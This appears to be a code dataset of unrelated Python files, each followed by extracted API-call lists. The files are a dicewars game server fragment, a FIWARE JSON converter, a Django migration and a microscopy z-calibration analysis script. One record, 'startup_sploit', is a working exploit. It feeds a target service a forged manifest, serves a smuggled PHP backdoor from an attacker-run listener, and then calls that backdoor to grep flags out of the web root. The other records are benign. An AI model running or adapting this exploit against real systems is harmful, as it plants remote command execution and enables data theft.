for i in range(1, self.number_of_players + 1):
self.players[i] = Player(i)
self.players_order = list(range(1, self.number_of_players + 1))
random.shuffle(self.players_order)
self.set_first_player()
self.logger.debug("Player order {0}".format(self.players_order))
def assign_areas_to_players(self, ownership):
"""Assigns areas to players at the start of the game
"""
assert(len(ownership) == self.board.get_number_of_areas())
for area_name, player_name in ownership.items():
area = self.board.get_area_by_name(area_name)
self.assign_area(area, self.players[player_name])
def adjust_player_order(self, nicknames_order):
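        # renumber players so their names follow the requested nickname order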
renumbering = {old_name: nicknames_order.index(player.nickname)+1 for old_name, player in self.players.items()}
self.players = {renumbering[old_name]: player for old_name, player in self.players.items()}
for name, player in self.players.items():
player.name = name
self.client_sockets = {renumbering[old_name]: socket for old_name, socket in self.client_sockets.items()}
registered_nicknames_rev = {player.nickname: player_name for player_name, player in self.players.items()}
assert(len(nicknames_order) == len(registered_nicknames_rev))
assert(set(nicknames_order) == set(registered_nicknames_rev.keys()))
self.players_order = []
for nick in nicknames_order:
self.players_order.append(registered_nicknames_rev[nick])
self.set_first_player()
def report_player_order(self):
self.logger.info('Player order: {}'.format([(name, self.players[name].nickname) for name in self.players_order]))
|
[
"random.randint",
"dicewars.ml.game.serialise_game_configuration",
"random.shuffle",
"socket.socket",
"random.choice",
"json.dumps",
"dicewars.ml.game.save_game_configurations",
"logging.getLogger"
] |
[((859, 886), 'logging.getLogger', 'logging.getLogger', (['"""SERVER"""'], {}), "('SERVER')\n", (876, 886), False, 'import logging\n'), ((13851, 13866), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (13861, 13866), False, 'import json\n'), ((17013, 17047), 'random.shuffle', 'random.shuffle', (['self.players_order'], {}), '(self.players_order)\n', (17027, 17047), False, 'import random\n'), ((6164, 6184), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (6178, 6184), False, 'import random\n'), ((6245, 6265), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (6259, 6265), False, 'import random\n'), ((7838, 7858), 'random.choice', 'random.choice', (['areas'], {}), '(areas)\n', (7851, 7858), False, 'import random\n'), ((14022, 14071), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (14035, 14071), False, 'import socket\n'), ((2639, 2707), 'dicewars.ml.game.serialise_game_configuration', 'serialise_game_configuration', ([], {'board': 'self.board', 'players': 'self.players'}), '(board=self.board, players=self.players)\n', (2667, 2707), False, 'from dicewars.ml.game import serialise_game_configuration, save_game_configurations\n'), ((2377, 2448), 'dicewars.ml.game.save_game_configurations', 'save_game_configurations', ([], {'winner_index': 'i', 'configurations': 'configurations'}), '(winner_index=i, configurations=configurations)\n', (2401, 2448), False, 'from dicewars.ml.game import serialise_game_configuration, save_game_configurations\n')]
|
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This Module converts Python-Objects into the Fiware-JSON-Format.
For more Information how to use this class, see the Readme.md
You can find the needed Files to convert from an Object into JSON
in the folder JsonToObject and vice versa
"""
import json
import sys, os
# Adding This Sub-Project into the PythonPath
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from json_to_object.reverse_entity import ReverseEntity
from object_to_json.entity import Entity
class ObjectFiwareConverter(object):
""" This class should be primarily used to convert a Object <-> JSON-string.
The classes in subdirectories are either used to convert them into JSON
or into a Python-specific-Object.
"""
@classmethod
def obj2Fiware(clsself, _object, ind=0, dataTypeDict={}, ignorePythonMetaData=False, showIdValue=True, encode=False):
en = Entity()
en.setObject(_object, dataTypeDict, ignorePythonMetaData, showIdValue= showIdValue, encode=encode)
return clsself._json(en, ind)
@classmethod
def fiware2Obj(clsself, _fiwareEntity, _objectStructure={}, useMetaData=True, ignoreWrongDataType=False, setAttr=False, encoded=False):
        jsonObj = None
        if isinstance(_fiwareEntity, str):
            jsonObj = clsself._obj(_fiwareEntity)
        else:
            jsonObj = _fiwareEntity
re = ReverseEntity(**jsonObj)
return re.setObject(_objectStructure, useMetaData, ignoreWrongDataType, setAttr, encoded=encoded)
@classmethod
def _complex_handler(clsself, Obj):
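        # json.dumps fallback: serialise arbitrary objects through their __dict__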
if hasattr(Obj, '__dict__'):
return Obj.__dict__
else:
raise TypeError('Object of type %s with value of %s is not JSON serializable' % (
type(Obj), repr(Obj)))
@classmethod
def _json(clsself, obj, ind=0):
return json.dumps(obj.__dict__, default=clsself._complex_handler, indent=ind)
@classmethod
def _obj(clsself, json_str):
return json.loads(json_str)
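# Usage sketch (hypothetical `Room` class; the exact JSON produced depends on
# the Entity/ReverseEntity helpers defined in the sub-packages):
if __name__ == '__main__':
    class Room:
        def __init__(self):
            self.temperature = 21.5
    fiware_json = ObjectFiwareConverter.obj2Fiware(Room(), ind=2)
    print(fiware_json)
    room = Room()
    ObjectFiwareConverter.fiware2Obj(fiware_json, room)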
|
[
"json_to_object.reverse_entity.ReverseEntity",
"json.loads",
"os.path.realpath",
"json.dumps",
"object_to_json.entity.Entity"
] |
[((962, 988), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (978, 988), False, 'import sys, os\n'), ((1495, 1503), 'object_to_json.entity.Entity', 'Entity', ([], {}), '()\n', (1501, 1503), False, 'from object_to_json.entity import Entity\n'), ((1982, 2006), 'json_to_object.reverse_entity.ReverseEntity', 'ReverseEntity', ([], {}), '(**jsonObj)\n', (1995, 2006), False, 'from json_to_object.reverse_entity import ReverseEntity\n'), ((2457, 2527), 'json.dumps', 'json.dumps', (['obj.__dict__'], {'default': 'clsself._complex_handler', 'indent': 'ind'}), '(obj.__dict__, default=clsself._complex_handler, indent=ind)\n', (2467, 2527), False, 'import json\n'), ((2594, 2614), 'json.loads', 'json.loads', (['json_str'], {}), '(json_str)\n', (2604, 2614), False, 'import json\n')]
|
#!/usr/bin/python3
import socket
import requests
import sys
if len(sys.argv) < 3:
print("Usage: ./startup_sploit <host> <my_ip>")
exit(1)
PORT = 3255
HOST = sys.argv[1]
MYIP = sys.argv[2]
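# left-pad the port with zeros so len(MYIP) + len(MYPORT) is always 925 -
# presumably to hit a fixed offset in the target's parser ("0...04000" is
# still parsed as port 4000)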
MYPORT = "0" * (921-len(MYIP)) + "4000"
MANIFEST = '{"links": [{"url": "http://mirror/wyjzmw.php", "checksum": "32bfce7a147d2fb0c87ff234c2848a37"}, {"url": "http://mirror/JhXY.php", "checksum": "d55ec508be338092ab591f3d7e4ab929"}]}'
SIGNATURE = 'c2f5e7a6e44e2fc4076a5930df75b02220c5f9313e0f3faa7ecb4e281dca359bc12426715e7c2902934e6995c9cdbcda93b8c4e0e5993f25309267b79978f504'
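# one-line PHP backdoor: when fetched with the right key, greps the web root
# for flag-like '=";' patterns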
FAKE_PHP = br"""<?php if($_GET["key"]=="KnfSM")system("grep '=\";' *")?>"""
PAYLOAD = b"""AAAAAA
Url: http://%s:%s/JhXY.php
Success: true
Hashsum: d55ec508be338092ab591f3d7e4ab929\n\n\n\n\n\n\n\n\n\n
Content-Length: %d
%s""" % (MYIP.encode(), MYPORT.encode(), len(FAKE_PHP), FAKE_PHP)
ANS = b"""HTTP/1.1 200 OK
Content-Length: %d
%s?>""" % (len(PAYLOAD), PAYLOAD)
c = socket.socket()
c.connect((HOST, PORT))
from_client = c.makefile("r")
to_client = c.makefile("w")
print(from_client.readline().strip())
print(from_client.readline().strip())
to_client.write("%s:%s\n" % (MYIP, MYPORT)); to_client.flush()
print(from_client.readline().strip())
to_client.write(MANIFEST+"\n"); to_client.flush()
print(from_client.readline().strip())
to_client.write(SIGNATURE+"\n"); to_client.flush()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", int(MYPORT)))
s.listen()
cl, cl_info = s.accept()
print("Got connection from %s, sending files" % (cl_info, ))
cl.sendall(ANS)
print(from_client.readline().strip())
print(from_client.readline().strip())
print(from_client.readline().strip())
print(requests.get("http://%s/JhXY.php?key=KnfSM" % HOST).text)
|
[
"socket.socket",
"requests.get"
] |
[((950, 965), 'socket.socket', 'socket.socket', ([], {}), '()\n', (963, 965), False, 'import socket\n'), ((1374, 1389), 'socket.socket', 'socket.socket', ([], {}), '()\n', (1387, 1389), False, 'import socket\n'), ((1715, 1766), 'requests.get', 'requests.get', (["('http://%s/JhXY.php?key=KnfSM' % HOST)"], {}), "('http://%s/JhXY.php?key=KnfSM' % HOST)\n", (1727, 1766), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-07 22:29
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('contentcuration', '0039_auto_20161101_1555'),
]
operations = [
migrations.AddField(
model_name='file',
name='assessment_item',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
related_name='files', to='contentcuration.AssessmentItem'),
),
]
|
[
"django.db.models.ForeignKey"
] |
[((467, 621), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""files"""', 'to': '"""contentcuration.AssessmentItem"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='files', to='contentcuration.AssessmentItem'\n )\n", (484, 621), False, 'from django.db import models\n')]
|
# test bin, analyze, and plot functions
# imports
import os
from os.path import join
from os import listdir
import matplotlib.pyplot as plt
# imports
import numpy as np
import pandas as pd
from scipy.optimize import curve_fit
import filter
import analyze
from correction import correct
from utils import fit, functions, bin, io, plotting, modify, plot_collections
from utils.plotting import lighten_color
# A note on SciencePlots colors
"""
Blue: #0C5DA5
Green: #00B945
Red: #FF9500
Orange: #FF2C00
Other Colors:
Light Blue: #7BC8F6
Paler Blue: #0343DF
Azure: #069AF3
Dark Green: #054907
"""
sciblue = '#0C5DA5'
scigreen = '#00B945'
scired = '#FF9500'
sciorange = '#FF2C00'
plt.style.use(['science', 'ieee', 'std-colors'])
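# open and close a throwaway figure just to record the style's default figure size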
fig, ax = plt.subplots()
size_x_inches, size_y_inches = fig.get_size_inches()
plt.close(fig)
# ----------------------------------------------------------------------------------------------------------------------
# 1. SETUP - BASE DIRECTORY
base_dir = '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/'
# ----------------------------------------------------------------------------------------------------------------------
# 2. SETUP - IDPT
path_idpt = join(base_dir, 'results-04.26.22_idpt')
path_test_coords = join(path_idpt, 'coords/test-coords')
path_calib_coords = join(path_idpt, 'coords/calib-coords')
path_similarity = join(path_idpt, 'similarity')
path_results = join(path_idpt, 'results')
path_figs = join(path_idpt, 'figs')
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
# 3. ANALYSIS - READ FILES
method = 'idpt'
microns_per_pixel = 0.8
# ----- 4.1 CORRECT TEST COORDS
correct_test_coords = False
if correct_test_coords:
use_idpt_zf = False
use_spct_zf = False
# ------------------------------------------------------------------------------------------------------------------
if use_idpt_zf:
"""
NOTE: This correction scheme fits a 2D spline to the in-focus particle positions and uses this to set their
z_f = 0 position.
"""
param_zf = 'zf_from_peak_int'
plot_calib_plane = False
plot_calib_spline = False
kx, ky = 2, 2
# step 1. read calibration coords
dfc, dfcpid, dfcpop, dfcstats = io.read_calib_coords(path_calib_coords, method)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std) & (dfcpid[param_zf] < zf_c_mean + zf_c_std)]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_calib_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/idpt-calib-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/idpt-calib-coords_fit-plane_raw.xlsx')
# step 4. FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
if plot_calib_spline:
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/idpt-calib-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# step 5. read test_coords
dft = io.read_test_coords(path_test_coords)
# step 6. drop unnecessary columns in dft
dft = dft[['frame', 'id', 'z', 'z_true', 'x', 'y', 'cm', 'error']]
# step 7. create a z_corr column by using fitted spline to correct z
dft = correct.correct_z_by_spline(dft, bispl=bispl_c, param_z='z')
dft['z_true_corr'] = dft['z_true'] - dft['z_cal_surf']
# step 8. export corrected test_coords
dft.to_excel(path_results + '/test_coords_corrected_t-calib2_c-calib1.xlsx', index=False)
elif use_spct_zf:
"""
NOTE: No correction is currently performed. The z-coords are well aligned enough in both calibration image sets
to just ignore. This is not necessarily surprising because the calibration images were acquired with the intention
of making the z-coords identical for all calibration image sets (by using the same beginning and ending tick mark
on the fine adjustment knob during image acquisition).
"""
# --------------------------------------------------------------------------------------------------------------
# SETUP - SPCT CALIBRATION IN-FOCUS COORDS
# SPCT analysis of images used for IDPT calibration
path_spct_calib_coords = join(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords')
path_calib_pid_defocus = join(path_spct_calib_coords, 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx')
path_calib_spct_stats = join(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx')
path_calib_spct_pop = join(path_spct_calib_coords, 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx')
# SPCT analysis of images used for IDPT test
path_spct_test_coords = join(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords')
path_test_pid_defocus = join(path_spct_test_coords, 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx')
path_test_spct_stats = join(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx')
path_test_spct_pop = join(path_spct_test_coords, 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx')
# --------------------------------------------------------------------------------------------------------------
# --- PART A. READ COORDS USED FOR IDPT CALIBRATION (i.e. 'calib1')
merge_spct_stats = True
param_zf = 'zf_from_peak_int'
plot_calib_plane = True
plot_test_plane = True
kx, ky = 2, 2
# step 1. merge [['x', 'y']] into spct pid defocus stats.
if merge_spct_stats:
# read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats
dfcpid = pd.read_excel(path_calib_pid_defocus)
dfcstats = pd.read_excel(path_calib_spct_stats)
dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats,
dfcpid])
else:
# read SPCT pid defocus stats that have already been merged
path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx')
dfcpid = pd.read_excel(path_calib_pid_defocus)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > 34) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)]
dfcpid = dfcpid[dfcpid['x'] > 120]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_calib_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/calibration-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/calibration-coords_fit-plane_raw.xlsx')
# FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/calibration-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# ---
# --- PART B. READ COORDS USED FOR IDPT TEST (i.e. 'calib2')
# step 1. merge [['x', 'y']] into spct pid defocus stats.
if merge_spct_stats:
# read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats
dfcpid = pd.read_excel(path_test_pid_defocus)
dfcstats = pd.read_excel(path_test_spct_stats)
dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats,
dfcpid])
else:
# read SPCT pid defocus stats that have already been merged
path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx')
dfcpid = pd.read_excel(path_calib_pid_defocus)
# step 2. remove outliers
# 2.1 get z_in-focus mean + standard deviation
zf_c_mean = dfcpid[param_zf].mean()
zf_c_std = dfcpid[param_zf].std()
# 2.2 filter calibration coords
dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std / 2) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)]
# step 3. fit plane
dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel)
popt_c = dictc_fit_plane['popt_pixels']
if plot_test_plane:
fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane)
plt.savefig(path_figs + '/test-coords_fit-plane_raw.png')
plt.close()
dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value'])
dfict_fit_plane.to_excel(path_figs + '/test-coords_fit-plane_raw.xlsx')
# FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION)
bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x,
y=dfcpid.y,
z=dfcpid[param_zf],
kx=kx,
ky=ky)
fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf],
bispl_c,
cmap='RdBu',
grid_resolution=30,
view='multi')
ax.set_xlabel('x (pixels)')
ax.set_ylabel('y (pixels)')
ax.set_zlabel(r'$z_{f} \: (\mu m)$')
plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3)))
plt.savefig(path_figs + '/test-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky))
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 4. PLOT TEST COORDS RMSE-Z
analyze_test_coords = False
save_plots = False
show_plots = False
if analyze_test_coords:
# read test coords
dft = io.read_test_coords(path_test_coords)
# test coords stats
mag_eff = 20.0
area_pixels = 512 ** 2
area_microns = (512 * microns_per_pixel) ** 2
i_num_rows = len(dft)
i_num_pids = len(dft.id.unique())
# ---
# --- STEP 0. drop and rename columns for simplicity
dft = dft.drop(columns=['z', 'z_true'])
dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'})
# ---
rmse_all_particles = False
rmse_on_off_bpe = False
rmse_compare = False
# format plots
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
lbls = ['On', 'Border', 'Off']
markers = ['s', 'd', 'o']
if rmse_all_particles:
# --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES
column_to_bin = 'z_true'
bins_z = 20
round_z_to_decimal = 3
min_cm = 0.5
# 1.1 mean rmse-z
dfrmse_mean = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=1,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse_mean.to_excel(path_results + '/mean-rmse-z_bin=1_no-filters.xlsx')
# 1.2 binned rmse-z
dfrmse = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=bins_z,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse.to_excel(path_results + '/binned-rmse-z_bins={}_no-filters.xlsx'.format(bins_z))
# 1.3 groupby 'bin' rmse-z mean + std
dfrmsem, dfrmsestd = bin.bin_generic(dft,
column_to_bin='bin',
column_to_count='id',
bins=bins_z,
round_to_decimal=round_z_to_decimal,
return_groupby=True)
# 1.3 plot binned rmse-z
if save_plots or show_plots:
# close all figs
plt.close('all')
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(dfrmse.index, dfrmse.rmse_z, '-o')
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/rmse-z_microns.png')
if show_plots:
plt.show()
plt.close()
# ----------------------- Z-MEAN +/- Z-STD PLOTS
# fit line
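            # linear fit of measured z against true z; a slope near 1 with small
            # residual RMSE indicates an unbiased calibration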
popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z)
z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max())
rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z)**2) / len(dfrmse.z))
print(rmse_fit_line)
# binned calibration curve with std-z errorbars (microns) + fit line
fig, ax = plt.subplots()
ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue,
label=r'$\overline{z} \pm \sigma$') #
ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25,
label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3)))
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs +
'/calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format(
np.round(popt[0],
3),
np.round(popt[1],
3))
)
if show_plots:
plt.show()
plt.close()
if rmse_on_off_bpe:
# --- STEP 0. SPLIT DATAFRAME INTO (1) OFF BPE and (2) OFF BPE.
column_to_bin = 'x'
bins_x = [145, 175, 205]
round_x_to_decimal = 0
dfbx = bin.bin_by_list(dft,
column_to_bin=column_to_bin,
bins=bins_x,
round_to_decimal=round_x_to_decimal,
)
df_on = dfbx[dfbx['bin'] == bins_x[0]]
df_edge = dfbx[dfbx['bin'] == bins_x[1]]
df_off = dfbx[dfbx['bin'] == bins_x[2]]
# --- plotting
# --- STEP 1. PLOT CALIBRATION CURVE (Z VS. Z_TRUE) FOR EACH DATAFRAME (ON, EDGE, OFF)
ss = 1
fig, ax = plt.subplots()
ax.scatter(df_off.z_true, df_off.z, s=ss, marker=markers[2], color=sciblue, label=lbls[2])
ax.scatter(df_on.z_true, df_on.z, s=ss, marker=markers[0], color=sciorange, label=lbls[0])
ax.scatter(df_edge.z_true, df_edge.z, s=ss, marker=markers[1], color=scired, label=lbls[1])
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', markerscale=2.5)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/on-edge-off-bpe_calibration_curve.png')
if show_plots:
plt.show()
plt.close()
# --- STEP 2. FOR EACH DATAFRAME (ON, EDGE, OFF), COMPUTE RMSE-Z AND PLOT
for lbl, dft in zip(lbls, [df_on, df_edge, df_off]):
# --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES
column_to_bin = 'z_true'
bins_z = 20
round_z_to_decimal = 3
min_cm = 0.5
# 1.1 mean rmse-z
dfrmse_mean = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=1,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse_mean.to_excel(path_results + '/{}_mean-rmse-z_bin=1_no-filters.xlsx'.format(lbl))
# 1.2 binned rmse-z
dfrmse = bin.bin_local_rmse_z(dft,
column_to_bin=column_to_bin,
bins=bins_z,
min_cm=min_cm,
z_range=None,
round_to_decimal=round_z_to_decimal,
df_ground_truth=None,
dropna=True,
error_column='error',
)
dfrmse.to_excel(path_results + '/{}_binned-rmse-z_bins={}_no-filters.xlsx'.format(lbl, bins_z))
# 1.3 groupby 'bin' rmse-z mean + std
dfrmsem, dfrmsestd = bin.bin_generic(dft,
column_to_bin='bin',
column_to_count='id',
bins=bins_z,
round_to_decimal=round_z_to_decimal,
return_groupby=True)
# 1.3 plot binned rmse-z
if save_plots or show_plots:
# close all figs
plt.close('all')
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(dfrmse.index, dfrmse.rmse_z, '-o')
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/{}_rmse-z_microns.png'.format(lbl))
if show_plots:
plt.show()
plt.close()
# ----------------------- Z-MEAN +/- Z-STD PLOTS
# fit line
popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z)
z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max())
rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z) ** 2) / len(dfrmse.z))
print(rmse_fit_line)
# binned calibration curve with std-z errorbars (microns) + fit line
fig, ax = plt.subplots()
ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1,
color=sciblue,
label=r'$\overline{z} \pm \sigma$') #
ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25,
label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3)))
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$z \: (\mu m)$')
ax.set_ylim([-xylim, xylim])
ax.set_yticks(ticks=xyticks, labels=xyticks)
ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3)
plt.tight_layout()
if save_plots:
plt.savefig(path_figs +
'/{}_calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format(
lbl,
np.round(popt[0],
3),
np.round(popt[1],
3))
)
if show_plots:
plt.show()
plt.close()
if rmse_compare:
# 1. read binned rmse-z dataframes from Excel
path_rmse_compare = join(path_results, 'on-edge-off-bpe')
df1 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[0])))
df2 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[1])))
df3 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[2])))
# 1.3 plot binned rmse-z
if save_plots or show_plots:
ms = 4
# ----------------------- BASIC RMSE-Z PLOTS
# rmse-z: microns
fig, ax = plt.subplots()
ax.plot(df3.bin, df3.rmse_z, '-o', ms=ms, label=lbls[2], color=sciblue)
ax.plot(df2.bin, df2.rmse_z, '-o', ms=ms, label=lbls[1], color=scired)
ax.plot(df1.bin, df1.rmse_z, '-o', ms=ms, label=lbls[0], color=sciorange)
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
